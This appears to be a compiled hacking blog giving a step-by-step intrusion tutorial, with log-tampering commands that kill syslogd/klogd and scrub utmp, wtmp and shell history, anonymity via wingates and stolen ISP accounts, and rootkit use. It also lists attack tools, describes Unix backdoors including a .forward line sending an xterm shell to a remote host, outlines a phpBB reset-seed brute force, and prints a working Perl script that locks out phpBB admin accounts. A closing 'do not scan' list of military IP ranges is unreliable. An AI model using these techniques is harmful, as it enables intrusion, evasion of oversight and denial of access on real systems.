This section needs to be further broken down into two categories of script kiddies: ones who scan the net for a host that is vulnerable to a certain exploit and ones who search a certain site for any exploit. The ones you see on alldas are the first kind ,they scan thousands of sites for a specific exploit. They do not care who they hack, anyone will do. They have no set target and not much of a purpose. In my opinion these people should either have a cause behind what they are doing, ie. "I make sure people keep up to date with security, I am a messanger" or "I am spreading a political message, I use defacements to get media attention". People who deface to get famous or to show off their skills need to grow up and relize there is a better way of going about this (not that I support the ones with other reasons ether). Anyways, the two kinds and what you need to know about them:

Scanning Script Kiddie: You need to know what signs of the hole are, is it a service? A certain OS? A CGI file? How can you tell if they are vuln? What version(s) are vuln? You need to know how to search the net to find targets which are running whatever is vuln. Use altavista.com or google.com for web based exploits. Using a script to scan ip ranges for a certain port that runs the vuln service. Or using netcraft.com to find out what kind of server they are running and what extras it runs (frontpage, php, etc..) nmap and other port scanners allow quick scans of thousands of ips for open ports. This is a favorate technique of those guys you see with mass hacks on alldas.

Targetted Site Script Kiddie: More respectable then the script kiddies who hack any old site. The main step here is gathering as much information about a site as possible. Find out what OS they run at netcraft or by using: telnet www.site.com 80 then GET / HTTP/1.1 Find out what services they run by doing a port scan. Find out the specifics on the services by telnetting to them. Find any cgi script, or other files which could allow access to the server if exploited by checking /cgi /cgi-bin and browsing around the site (remember to index browse)

Wasn't so hard to get the info was it? It may take awhile, but go through the site slowly and get all the information you can.

2. Getting In
Now that we got the info on the site we can find the exploit(s) we can use to get access. If you were a scanning script kiddie you would know the exploit ahead of time. A couple of great places to look for exploits are Security Focus and packetstorm. Once you get the exploit check and make sure that the exploit is for the same version as the service, OS, script, etc.. Exploits mainly come in two languages, the most used are C and perl. Perl scripts will end in .pl or .cgi, while C will end in .c To compile a C file (on *nix systems) do gcc -o exploit12 file.c then: ./exploit12 For perl just do: chmod 700 file.pl (not really needed) then: perl file.pl. If it is not a script it might be a very simple exploit, or just a theory of a possible exploit. Just do alittle research into how to use it. Another thing you need to check is weither the exploit is remote or local. If it is local you must have an account or physical access to the computer. If it is remote you can do it over a network (internet).

Don't go compiling exploits just yet, there is one more important thing you need to know

Covering Your Tracks
So by now you have gotten the info on the host inorder to find an exploit that will allow you to get access. So why not do it? The problem with covering your tracks isn't that it is hard, rather that it is unpredictable. just because you killed the sys logging doesn't mean that they don't have another logger or IDS running somewhere else. (even on another box). Since most script kiddies don't know the skill of the admin they are targetting they have no way of knowing if they have additional loggers or what. Instead the script kiddie makes it very hard (next to impossible) for the admin to track them down. Many use a stolden or second isp account to begin with, so even if they get tracked they won't get caught. If you don't have the luxery of this then you MUST use multiple wingates, shell accounts, or trojans to bounce off of. Linking them together will make it very hard for someone to track you down. Logs on the wingates and shells will most likely be erased after like 2-7 days. That is if logs are kept at all. It is hard enough to even get ahold of one admin in a week, let alone further tracking the script kiddie down to the next wingate or shell and then getting ahold of that admin all before the logs of any are erased. And it is rare for an admin to even notice an attack, even a smaller percent will actively pursue the attacker at all and will just secure their box and forget it ever happend. For the sake of arugment lets just say if you use wingates and shells, don't do anything to piss the admin off too much (which will get them to call authoritizes or try to track you down) and you deleting logs you will be safe. So how do you do it?

We will keep this very short and too the point, so we'll need to get a few wingates. Wingates by nature tend to change IPs or shutdown all the time, so you need an updated list or program to scan the net for them. You can get a list of wingates that is well updated at http://www.cyberarmy.com/lists/wingate/ and you can also get a program called winscan there. Now lets say we have 3 wingates:

212.96.195.33 port 23
202.134.244.215 port 1080
203.87.131.9 port 23

to use them we go to telnet and connect to them on port 23. we should get a responce like this:

CSM Proxy Server >

to connect to the next wingate we just type in it's ip:port

CSM Proxy Server >202.134.244.215:1080
If you get an error it is most likely to be that the proxy you are trying to connect to isn't up, or that you need to login to the proxy. If all goes well you will get the 3 chained together and have a shell account you are able to connect to. Once you are in your shell account you can link shells together by:

[j00@server j00]$ ssh 212.23.53.74

You can get free shells to work with until you get some hacked shells, here is a list of free shell accounts. And please remember to sign up with false information and from a wingate if possible.

SDF (freeshell.org) - http://sdf.lonestar.org
GREX (cyberspace.org) - http://www.grex.org
NYX - http://www.nxy.net
ShellYeah - http://www.shellyeah.org
HOBBITON.org - http://www.hobbiton.org
FreeShells - http://www.freeshells.net
DucTape - http://www.ductape.net
Free.Net.Pl (Polish server) - http://www.free.net.pl
XOX.pl (Polish server) - http://www.xox.pl
IProtection - http://www.iprotection.com
CORONUS - http://www.coronus.com
ODD.org - http://www.odd.org
MARMOSET - http://www.marmoset.net
flame.org - http://www.flame.org
freeshells - http://freeshells.net.pk
LinuxShell - http://www.linuxshell.org
takiweb - http://www.takiweb.com
FreePort - http://freeport.xenos.net
BSDSHELL - http://free.bsdshell.net
ROOTshell.be - http://www.rootshell.be
shellasylum.com - http://www.shellasylum.com
Daforest - http://www.daforest.org
FreedomShell.com - http://www.freedomshell.com
LuxAdmin - http://www.luxadmin.org
shellweb - http://shellweb.net
blekko - http://blekko.net

once you get on your last shell you can compile the exploit, and you should be safe from being tracked. But lets be even more sure and delete the evidence that we were there.

Alright, there are a few things on the server side that all script kiddies need to be aware of. Mostly these are logs that you must delete or edit. The real script kiddies might even use a rootkit to automaticly delete the logs. Although lets assume you aren't that lame. There are two main logging daemons which I will cover, klogd which is the kernel logs, and syslogd which is the system logs. First step is to kill the daemons so they don't log anymore of your actions.

[root@hacked root]# ps -def | grep syslogd
[root@hacked root]# kill -9 pid_of_syslogd

in the first line we are finding the pid of the syslogd, in the second we are killing the daemon. You can also use /etc/syslog.pid to find the pid of syslogd.

[root@hacked root]# ps -def | grep klogd
[root@hacked root]# kill -9 pid_of_klogd

Same thing happening here with klogd as we did with syslogd.

now that killed the default loggers the script kiddie needs to delete themself from the logs. To find where syslogd puts it's logs check the /etc/syslog.conf file. Of course if you don't care if the admin knows you were there you can delete the logs completely. Lets say you are the lamest of the script kiddies, a defacer, the admin would know that the box has been comprimised since the website was defaced. So there is no point in appending the logs, they would just delete them. The reason we are appending them is so that the admin will not even know a break in has accurd. I'll go over the main reasons people break into a box:

To deface the website. - this is really lame, since it has no point and just damages the system.

To sniff for other network passwords. - there are programs which allow you to sniff other passwords sent from and to the box. If this box is on an ethernet network then you can even sniff packets (which contain passwords) that are destined to any box in that segment.

To mount a DDoS attack. - another lame reason, the admin has a high chance of noticing that you compromised him once you start sending hundreds of MBs through his connection.

To mount another attack on a box. - this and sniffing is the most commonly used, not lame, reason for exploiting something. Since you now how a rootshell you can mount your attack from this box instead of those crappy freeshells. And you now have control over the logging of the shell.

To get sensitive info. - some corporate boxes have a lot of valuable info on them. Credit card databases, source code for software, user/password lists, and other top secret info that a hacker may want to have.

To learn and have fun. - many people do it for the thrill of hacking, and the knowledge you gain. I don't see this as horrible a crime as defacing. as long as you don't destroy anything I don't think this is very bad. Infact some people will even help the admin patch the hole. Still illegal though, and best not to break into anyone's box.

I'll go over the basic log files: utmp, wtmp, lastlog, and .bash_history
These files are usually in /var/log/ but I have heard of them being in /etc/ /usr/bin/ and other places. Since it is different on alot of boxes it is best to just do a find / -iname 'utmp'|find / -iname 'wtmp'|find / -iname 'lastlog'. and also search threw the /usr/ /var/ and /etc/ directories for other logs. Now for the explanation of these 3.

utmp is the log file for who is on the system, I think you can see why this log should be appended. Because you do not want to let anyone know you are in the system. wtmp logs the logins and logouts as well as other info you want to keep away from the admin. Should be appended to show that you never logged in or out. and lastlog is a file which keeps records of all logins. Your shell's history is another file that keeps a log of all the commands you issued, you should look for it in your $ HOME directory and edit it, .sh_history, .history, and .bash_history are the common names. you should only append these log files, not delete them. if you delete them it will be like holding a big sign infront of the admin saying "You've been hacked". Newbie script kiddies often deface and then rm -rf / to be safe. I would avoid this unless you are really freaking out. In this case I would suggest that you never try to exploit a box again. Another way to find log files is to run a script to check for open files (and then manually look at them to determine if they are logs) or do a find for files which have been editted, this command would be: find / -ctime 0 -print

A few popular scripts which can hide your presence from logs include: zap, clear and cloak. Zap will replace your presence in the logs with 0's, clear will clear the logs of your presence, and cloak will replace your presence with different information. acct-cleaner is the only heavily used script in deleting account logging from my experience. Most rootkits have a log cleaning script, and once you installed it logs are not kept of you anyways. If you are on NT the logs are at C:\winNT\system32\LogFiles\, just delete them, nt admins most likely don't check them or don't know what it means if they are deleted.

One final thing about covering your tracks, I won't go to into detail about this because it would require a tutorial all to itself. I am talking about rootkits. What are rootkits? They are a very widely used tool used to cover your tracks once you get into a box. They will make staying hidden painfree and very easy. What they do is replace the binaries like login, ps, and who to not show your presence, ever. They will allow you to login without a password, without being logged by wtmp or lastlog and without even being in the /etc/passwd file. They also make commands like ps not show your processes, so no one knows what programs you are running. They send out fake reports on netstat, ls, and w so that everything looks the way it normally would, except anything you do is missing. But there are some flaws in rootkits, for one some commands produce strange effects because the binary was not made correctly. They also leave fingerprints (ways to tell that the file is from a rootkit). Only smart/good admins check for rootkits, so this isn't the biggest threat, but it should be concidered. Rootkits that come with a LKM (loadable kernel module) are usually the best as they can pretty much make you totally invisible to all others and most admins wouldn't be able to tell they were compromised.

In writting this tutorial I have mixed feelings. I do not want more script kiddies out their scanning hundreds of sites for the next exploit. And I don't want my name on any shouts. I rather would like to have people say "mmm, that defacing crap is pretty lame" especially when people with no lives scan for exploits everyday just to get their name on a site for a few minutes. I feel alot of people are learning everything but what they need to know inorder to break into boxes. Maybe this tutorial cut to the chase alittle and helps people with some knowledge see how simple it is and hopefully make them see that getting into a system is not all it's hyped up to be. It is not by any means a full guide, I did not cover alot of things. I hope admins found this tutorial helpful aswell, learning that no matter what site you run you should always keep on top of the latest exploits and patch them. Protect yourself with IDS and try finding holes on your own system (both with vuln scanners and by hand). Also setting up an external box to log is not a bad idea. Admins should have also seen alittle bit into the mind of a script kiddie and learned a few things he does.. this should help you catch one if they break into your systems.

Many people who have defaced in the past and regret it now. You will be labeled a script kiddie and a lamer for a long, long time.

Command line tools, gathered from anywhere (no offence) :

2008-08-04T10:38:00.001-07:00

Command line tools, gathered from anywhere (no offence) :

Info.txt:
A handy collection of command line tools
cpuinfo.exe - gets the processor type and CPU clocking speed (mhz)
fport.exe - shows open ports and the process that owns the port
iplist.exe - enumerates the ip's of the computer
md5.exe - gets the md5 hash of a file
pw2kget.exe - for win2k gets the password of the currently logged on user
pwreveal.exe - gets the passwords of any window that has a ****** editbox
regshell.exe - a command line registry explorer/editor
resolve.exe - a command line URL resolver
sendmail.exe - a command line email sender
uptime.exe - gets the machines current uptime
xwhois - advanced whois lookup
Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp
CMDget.exe - Downloads a file from a website from user provided parameters
webscr.exe - creates a snapshot from the webcam and saves it
shutd.exe - program that forces shutdown/reboot of machine
bnc.exe - bnc for windows (see bnc.cfg)
clslog.exe - clears app/security/system logs XP/NT/2k
enum.exe - enumerates IPC$ share to collect information
winfo.exe - enumerates IPC$ share to collect information
FTPd.exe - small ftp server for dos (see slimftpd.conf)
Global.exe - process dos command on all disc/subdirs
iCmd.exe - telnet server 98/xp/nt/2k
iislog.exe - clears IIS logs
Info.exe - gets system information
ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)
nc.exe - netcat
pv.exe - process manager for dos
Pwdump.exe - dumps SAM hashes
scrnmode.exe - change screen mode from dos
unrar.exe - unrar for dos
wget.exe - wget for windows
wizmo.exe - command tool (see w.txt)
dwpp.exe - dial up password graber
winrelay.exe - relay tcp/udp connections
getad.exe - escalate to admin user in w2k
pipeup.exe - escalate to admin user in w2k
dnsid - identify remore dns server
rinetd.exe see rinetd.txt

System backdoor Explained! :

2008-08-04T10:34:00.000-07:00

System backdoor Explained! :

Since the early days of intruders breaking into computers, they have tried

to develop techniques or backdoors that allow them to get back into the

system. In this paper, it will be focused on many of the common backdoors

and possible ways to check for them. Most of focus will be on Unix

backdoors with some discussion on future Windows NT backdoors. This will

describe the complexity of the issues in trying to determine the methods

that intruders use and the basis for administrators understanding on how

they might be able to stop the intruders from getting back in. When an

administrator understands how difficult it would be to stop intruder once

they are in, the appreciation of being proactive to block the intruder from

ever getting in becomes better understood. This is intended to cover many

of the popular commonly used backdoors by beginner and advanced intruders.

This is not intended to cover every possible way to create a backdoor as

the possibilities are limitless.

The backdoor for most intruders provide two or three main functions:

Be able to get back into a machine even if the administrator tries to

secure it, e.g., changing all the passwords.

Be able to get back into the machine with the least amount of visibility.

Most backdoors provide a way to avoid being logged and many times the

machine can appear to have no one online even while an intruder is using it.

Be able to get back into the machine with the least amount of time. Most

intruders want to easily get back into the machine without having to do all

the work of exploiting a hole to gain access.

In some cases, if the intruder may think the administrator may detect any

installed backdoor, they will resort to using the vulnerability repeatedly

to get on a machine as the only backdoor. Thus not touching anything that

may tip off the administrator. Therefore in some cases, the

vulnerabilities on a machine remain the only unnoticed backdoor.

Password Cracking Backdoor :

One of the first and oldest methods of intruders used to gain not only

access to a Unix machine but backdoors was to run a password cracker. This

uncovers weak passworded accounts. All these new accounts are now possible

backdoors into a machine even if the system administrator locks out the

intruder's current account. Many times, the intruder will look for unused

accounts with easy passwords and change the password to something

difficult. When the administrator looked for all the weak passworded

accounts, the accounts with modified passwords will not appear. Thus the

administrator will not be able to easily determine which accounts to lock

out.

Rhosts + + Backdoor :

On networked Unix machines, services like Rsh and Rlogin used a simple

authentication method based on hostnames that appear in rhosts. A user

could easily configure which machines not to require a password to log

into. An intruder that gained access to someone's rhosts file could put a

"+ +" in the file and that would allow anyone from anywhere to log into

that account without a password. Many intruders use this method especially

when NFS is exporting home directories to the world. These accounts

become backdoors for intruders to get back into the system. Many intruders

prefer using Rsh over Rlogin because it is many times lacking any logging

capability. Many administrators check for "+ +" therefore an intruder may

actually put in a hostname and username from another compromised account on

the network, making it less obvious to spot.

Checksum and Timestamp Backdoors :

Early on, many intruders replaced binaries with their own trojan versions.

Many system administrators relied on time-stamping and the system checksum

programs, e.g., Unix's sum program, to try to determine when a binary file

has been modified. Intruders have developed technology that will recreate

the same time-stamp for the trojan file as the original file. This is

accomplished by setting the system clock time back to the original file's

time and then adjusting the trojan file's time to the system clock. Once

the binary trojan file has the exact same time as the original, the system

clock is reset to the current time. The sum program relies on a CRC

checksum and is easily spoofed. Intruders have developed programs that

would modify the trojan binary to have the necessary original checksum,

thus fooling the administrators. MD5 checksums is the recommended choice

to use today by most vendors. MD5 is based on an algorithm that no one has

yet to date proven can be spoofed.

Login Backdoor :

On Unix, the login program is the software that usually does the password

authentication when someone telnets to the machine. Intruders grabbed the

source code to login.c and modified it that when login compared the user's

password with the stored password, it would first check for a backdoor

password. If the user typed in the backdoor password, it would allow you to

log in regardless of what the administrator sets the passwords to. Thus

this allowed the intruder to log into any account, even root. The

password backdoor would spawn access before the user actually logged in and

appeared in utmp and wtmp. Therefore an intruder could be logged in and

have shell access without it appearing anyone is on that machine as that

account. Administrators started noticing these backdoors especially if

they did a "strings" command to find what text was in the login program.

Many times the backdoor password would show up. The intruders then

encrypted or hid the backdoor password better so it would not appear by

just doing strings. Many of the administrators can detect these backdoors

with MD5 checksums.

Telnetd Backdoor :

When a user telnets to the machine, inetd service listens on the port and

receive the connection and then passes it to in.telnetd, that then runs

login. Some intruders knew the administrator was checking the login

program for tampering, so they modified in.telnetd. Within in.telnetd, it

does several checks from the user for things like what kind of terminal the

user was using. Typically, the terminal setting might be Xterm or VT100.

An intruder could backdoor it so that when the terminal was set to

"letmein", it would spawn a shell without requiring any authentication.

Intruders have backdoored some services so that any connection from a

specific source port can spawn a shell.

Services Backdoor

Almost every network service has at one time been backdoored by an

intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even

inetd, etc., have been floating around forever. There are programs that

are nothing more than a shell connected to a TCP port with maybe a backdoor

password to gain access. These programs sometimes replace a service like

uucp that never gets used or they get added to the inetd.conf file as a new

service. Administrators should be very wary of what services are running

and analyze the original services by MD5 checksums.

Cronjob backdoor

Cronjob on Unix schedules when certain programs should be run. An intruder

could add a backdoor shell program to run between 1 AM and 2 AM. So for 1

hour every night, the intruder could gain access. Intruders have also

looked at legitimate programs that typically run in cronjob and built

backdoors into those programs as well.

Library backdoors

Almost every UNIX system uses shared libraries. The shared libraries are

intended to reuse many of the same routines thus cutting down on the size

of programs. Some intruders have backdoored some of the routines like

crypt.c and _crypt.c. Programs like login.c would use the crypt() routine

and if a backdoor password was used it would spawn a shell. Therefore,

even if the administrator was checking the MD5 of the login program, it was

still spawning a backdoor routine and many administrators were not checking

the libraries as a possible source of backdoors.

One problem for many intruders was that some administrators started MD5

checksums of almost everything. One method intruders used to get around

that is to backdoor the open() and file access routines. The backdoor

routines were configured to read the original files, but execute the trojan

backdoors. Therefore, when the MD5 checksum program was reading these

files, the checksums always looked good. But when the system ran the

program, it executed the trojan version. Even the trojan library itself,

could be hidden from the MD5 checksums. One way to an administrator could

get around this backdoor was to statically link the MD5 checksum checker

and run on the system. The statically linked program does not use the

trojan shared libraries.

Kernel backdoors

The kernel on Unix is the core of how Unix works. The same method used for

libraries for bypassing MD5 checksum could be used at the kernel level,

except even a statically linked program could not tell the difference. A

good backdoored kernel is probably one of the hardest to find by

administrators, fortunately kernel backdoor scripts have not yet been

widely made available and no one knows how wide spread they really are.

File system backdoors

An intruder may want to store their loot or data on a server somewhere

without the administrator finding the files. The intruder's files can

typically contain their toolbox of exploit scripts, backdoors, sniffer

logs, copied data like email messages, source code, etc. To hide these

sometimes large files from an administrator, an intruder may patch the

files system commands like "ls", "du", and "fsck" to hide the existence of

certain directories or files. At a very low level, one intruder's backdoor

created a section on the hard drive to have a proprietary format that was

designated as "bad" sectors on the hard drive. Thus an intruder could

access those hidden files with only special tools, but to the regular

administrator, it is very difficult to determine that the marked "bad"

sectors were indeed storage area for the hidden file system.

Bootblock backdoors

In the PC world, many viruses have hid themselves within the bootblock

section and most antivirus software will check to see if the bootblock has

been altered. On Unix, most administrators do not have any software that

checks the bootblock, therefore some intruders have hidden some backdoors

in the bootblock area.

Process hiding backdoors

An intruder many times wants to hide the programs they are running. The

programs they want to hide are commonly a password cracker or a sniffer.

There are quite a few methods and here are some of the more common:

An intruder may write the program to modify its own argv[] to make it look

like another process name.

An intruder could rename the sniffer program to a legitimate service like

in.syslog and run it. Thus when an administrator does a "ps" or looks at

what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show

all the processes.

An intruder could patch a backdoor or program into an interrupt driven

routine so it does not appear in the process table. An example backdoor

using this technique is amod.tar.gz available on

http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

An intruder could modify the kernel to hide certain processes as well.

Rootkit

One of the most popular packages to install backdoors is rootkit. It can

easily be located using Web search engines. From the Rootkit README, here

are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.

Es - rokstar's ethernet sniffer for sun4 based kernels.

Fix - try to fake checksums, install with same dates/perms/u/g.

Sl - become root via a magic password sent to login.

Ic - modified ifconfig to remove PROMISC flag from output.

ps: - hides the processes.

Ns - modified netstat to hide connections to certain machines.

Ls - hides certain directories and files from being listed.

du5 - hides how much space is being used on your hard drive.

ls5 - hides certain files and directories from being listed.

Network traffic backdoors

Not only do intruders want to hide their tracks on the machine, but also

they want to hide their network traffic as much as possible. These network

traffic backdoors sometimes allow an intruder to gain access through a

firewall. There are many network backdoor programs that allow an intruder

to set up on a certain port number on a machine that will allow access

without ever going through the normal services. Because the traffic is

going to a non-standard network port, the administrator can overlook the

intruder's traffic. These network traffic backdoors are typically using

TCP, UDP, and ICMP, but it could be many other kinds of packets.

TCP Shell Backdoors

The intruder can set up these TCP Shell backdoors on some high port number

possibly where the firewall is not blocking that TCP port. Many times,

they will be protected with a password just so that an administrator that

connects to it, will not immediately see shell access. An administrator

can look for these connections with netstat to see what ports are listening

and where current connections are going to and from. Many times, these

backdoors allow an intruder to get past TCP Wrapper technology. These

backdoors could be run on the SMTP port, which many firewalls allow traffic

to pass for e-mail.

UDP Shell Backdoors

Administrator many times can spot a TCP connection and notice the odd

behavior, while UDP shell backdoors lack any connection so netstat would

not show an intruder accessing the Unix machine. Many firewalls have been

configured to allow UDP packets for services like DNS through. Many times,

intruders will place the UDP Shell backdoor on that port and it will be

allowed to by-pass the firewall.

ICMP Shell Backdoors

Ping is one of the most common ways to find out if a machine is alive by

sending and receiving ICMP packets. Many firewalls allow outsiders to ping

internal machines. An intruder can put data in the Ping ICMP packets and

tunnel a shell between the pinging machines. An administrator may notice a

flurry of Ping packets, but unless the administrator looks at the data in

the packets, an intruder can be unnoticed.

Encrypted Link

An administrator can set up a sniffer trying to see data appears as someone

accessing a shell, but an intruder can add encryption to the Network

traffic backdoors and it becomes almost impossible to determine what is

actually being transmitted between two machines.

Windows NT

Because Windows NT does not easily allow multiple users on a single machine

and remote access similar as Unix, it becomes harder for the intruder to

break into Windows NT, install a backdoor, and launch an attack from it.

Thus you will find more frequently network attacks that are spring boarded

from a Unix box than Windows NT. As Windows NT advances in multi-user

technologies, this may give a higher frequency of intruders who use Windows

NT to their advantage. And if this does happen, many of the concepts from

Unix backdoors can be ported to Windows NT and administrators can be ready

for the intruder. Today, there are already telnet daemons available for

Windows NT. With Network Traffic backdoors, they are very feasible for

intruders to install on Windows NT.

Solutions

As backdoor technology advances, it becomes even harder for administrators

to determine if an intruder has gotten in or if they have been successfully

locked out.

Assessment

One of the first steps in being proactive is to assess how vulnerable your

network is, thus being able to figure out what holes exist that should be

fixed. Many commercial tools exist to help scan and audit the network and

systems for vulnerabilities. Many companies could dramatically improve

their security if they only installed the security patches made freely

available by their vendors.

MD5 Baselines

One necessary component of a system scanner is MD5 checksum baselines.

This MD5 baseline should be built up before a hacker attack with clean

systems. Once a hacker is in and has installed backdoors, trying to create

a baseline after the fact could incorporate the backdoors into the

baseline. Several companies had been hacked and had backdoors installed on

their systems for many months. Overtime, all the backups of the systems

contained the backdoors. When some of these companies found out they had

a hacker, they restored a backup in hopes of removing any backdoors. The

effort was futile since they were restoring all the files, even the

backdoored ones. The binary baseline comparison needs to be done before an

attack happens.

Intrusion detection

Intrusion detection is becoming more important as organizations are hooking

up and allowing connections to some of their machines. Most of the older

intrusion detection technology was log-based events. The latest intrusion

detection system (IDS) technology is based on real-time sniffing and

network traffic security analysis. Many of the network traffic backdoors

can now easily be detected. The latest IDS technology can take a look at

the DNS UDP packets and determine if it matches the DNS protocol requests.

If the data on the DNS port does not match the DNS protocol, an alert flag

can be signaled and the data captured for further analysis. The same

principle can be applied to the data in an ICMP packet to see if it is the

normal ping data or if it is carrying encrypted shell session.

Boot from CD-ROM.

Some administrators may want to consider booting from CD-ROM thus

eliminating the possibility of an intruder installing a backdoor on the

CD-ROM. The problem with this method is the cost and time of implementing

this solution enterprise wide.

Vigilant

Because the security field is changing so fast, with new vulnerabilities

being announced daily and intruders are constantly designing new attack and

backdoor techniques, no security technology is effective without vigilance.

Be aware that no defense is foolproof, and that there is no substitute for

diligent attention.

-------------------------------------------------------------------------
you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also

a common method of regaining access. For the account ``username''

a .forward file might be constructed as follows:

\username

|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

permutations of this method include alteration of the systems mail

aliases file (most commonly located at /etc/aliases). Note that

this is a simple permutation, the more advanced can run a simple

script from the forward file that can take arbitrary commands via

stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies

mailhub (assuming there is a shared a home directory FS on

the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite

> possibly still a problem if you allow things like elm's filter or

> procmail which can run programs themselves...).

---------------------------------------------------------------------------
you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/password file,

most login(1) implementations will fail to detect the wrong

uid/gid and atoi(3) will set uid/gid to 0, giving superuser

privileges.

example:

rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh

on Linux boxes, this will give uid 0 to user rmartin.

2008-08-04T10:30:00.000-07:00

Find Port In Webservers :
Follow this...

Hi buddy just follow the below procedure to find out which ports are open on a particular system.

1. Download Nmap tool from the site www.insecure.org/nmap

2. Install it in your system.

3. Go to command prompt and just go to the path of the drive in which nmap is installed.

ex: c:\nmap

4. Now this is the command to type.

For example if u want to know about the open ports of Yahoo server.

c:\nmap nmap -sT -p 1-200 www.yahoo.com

From the above command 1-200 are the port numbers of the server u can give any number of port numbers that you want, just try this one and see. Sep 3 p@r@noid
netstat -n
try this command this will give you all the IP(s) along with port whom you are connected..
or u may try netstat -a

SAUV : u can use other scanners also to port scan a remote pc
2.try Medusa after nmap.

=====================================================================================
Reseting Phpbb Password :

Introduction:
In this tutorial I will be demonstrating the simplicity in getting around password reset systems that are based on random numbers. Specifically, we will be looking at the very popular open source forum software phpBB. I won’t be providing fully functional applications, to avoid it getting into the wrong hands, but I will illustrate enough for anyone with any coding skills to draft up their own version.

Start The Hack:
Before we start the hack there’s a few things we need to get out of the way. The first is to get the servers time. To do this, we can use a number of techniques but I won’t be going into them. I’ll simply assume that you already know how to do this. The second step is make a password reset request for the account which we want to take over. Note that the email must be sent from the system that is hosting the phpBB forum. Make note of when you make the request, this will become crucial. When the email is sent it will contain a link that will perform the actual password reset. It is this URL that we are going to try and generate with our application. An important thing to note is that the system generated reset URL is only valid for 48 hours. This means that the hack has to be carried out during that time period. Luckily that’s more than enough for us to successfully pull it off.

The Technique:
By this stage you should have already successfully sent a password reset request and made note of the time it was made. So let’s move onto how this hack is actually going to work. Essentially we’re going to generate the exact same URL that was sent in the email.

In order to do this we will need to employ the same algorithm that phpBB has used to generate the address. The way phpBB does it is by using a random number within the URL. Of course, anyone that has done any amount of coding in their life can tell you that random numbers are never truly random. All you need to produce the same random value is the seed that was used within the random number algorithm.

Most systems will use the server clock because the value is always changing and wouldn’t you believe it, that’s exactly what phpBB does. So it’s with this little bit of information that we can generate the same seed that was used when the reset password email was created. By now you’ve probably started wondering how we’re going to know what that seed is. Well the short and sweet of it is that we don’t. We’re going to be messy and brute force the seed. This is why we need to note the time the email was sent with only a small amount of certainty.

Implementing the Technique:
Since we’re going to be brute forcing things here we might as well be efficient and give ourselves a five minute buffer on either side of our recorded reset request time. This should give us a ten minute window from when the reset was mad, which ought to be plenty. The next step is to generate every possible URL that could have been generated during that time period with the intervals acting as the seed. We’ll store the URLs in memory with perhaps a linked list or an array. Ultimately the choice is up to you so long as you can access the values later on. The final step is to run through each of the generated URLs to find a successfully validated reset request.

Conclusion

While the process may seem long and tedious, through proper automation and analysis of the process there’s a number of ways that one could reduce the amount of generated results. As for those non-coders out there, this would definitely be a good start in understanding simple concepts like loops, conditionals, efficiency and regular expression.

=====================================================================================

PHPBB 2.0.20 Disable admin exploit :
Exploit from :- http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.txt

Here is the code :

###################################################################################
#!/usr/bin/perl
# Priv8 Exploit for PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
#Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
-------------------------------------
phpbb-Disable-user.php Host /Dir Port Admin
--------------------------------------
";
$i=1;
if ($host ne ""){
while($OK ne 1){

use IO::Socket;
my($socket) ="";
if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
PeerPort => $port ,
Proto => "TCP"))
{

$password=rand();
$data = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;

}}

VERY VERY CRUCIAL AND IMPORTANT POST

2008-08-04T10:27:00.000-07:00

Dont Dare To Scan Them :

I am giving here the IP's that must never be scanned or else... :

Quote
RANGE 6
6.* - Army Information Systems Center

RANGE 7
7.*.*.* Defense Information Systems Agency, VA

RANGE 11
11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington DC

RANGE 21
21. - US Defense Information Systems Agency

RANGE 22
22.* - Defense Information Systems Agency

RANGE 24
24.198.*.*

RANGE 25
25.*.*.* Royal Signals and Radar Establishment, UK

RANGE 26
26.* - Defense Information Systems Agency

RANGE 29
29.* - Defense Information Systems Agency

RANGE 30
30.* - Defense Information Systems Agency

RANGE 49
49.* - Joint Tactical Command

RANGE 50
50.* - Joint Tactical Command

RANGE 55
55.* - Army National Guard Bureau

RANGE 55
55.* - Army National Guard Bureau

RANGE 62
62.0.0.1 - 62.30.255.255 Do not scan!

RANGE 64
64.70.*.* Do not scan
64.224.* Do not Scan
64.225.* Do not scan
64.226.* Do not scan

RANGE 128
128.37.0.0 Army Yuma Proving Ground
128.38.0.0 Naval Surface Warfare Center
128.43.0.0 Defence Research Establishment-Ottawa
128.47.0.0 Army Communications Electronics Command
128.49.0.0 Naval Ocean Systems Center
128.50.0.0 Department of Defense
128.51.0.0 Department of Defense
128.56.0.0 U.S. Naval Academy
128.60.0.0 Naval Research Laboratory
128.63.0.0 Army Ballistics Research Laboratory
128.80.0.0 Army Communications Electronics Command
128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency
128.102.0.0 NASA Ames Research Center
128.149.0.0 NASA Headquarters
128.154.0.0 NASA Wallops Flight Facility
128.155.0.0 NASA Langley Research Center
128.156.0.0 NASA Lewis Network Control Center
128.157.0.0 NASA Johnson Space Center
128.158.0.0 NASA Ames Research Center
128.159.0.0 NASA Ames Research Center
128.160.0.0 Naval Research Laboratory
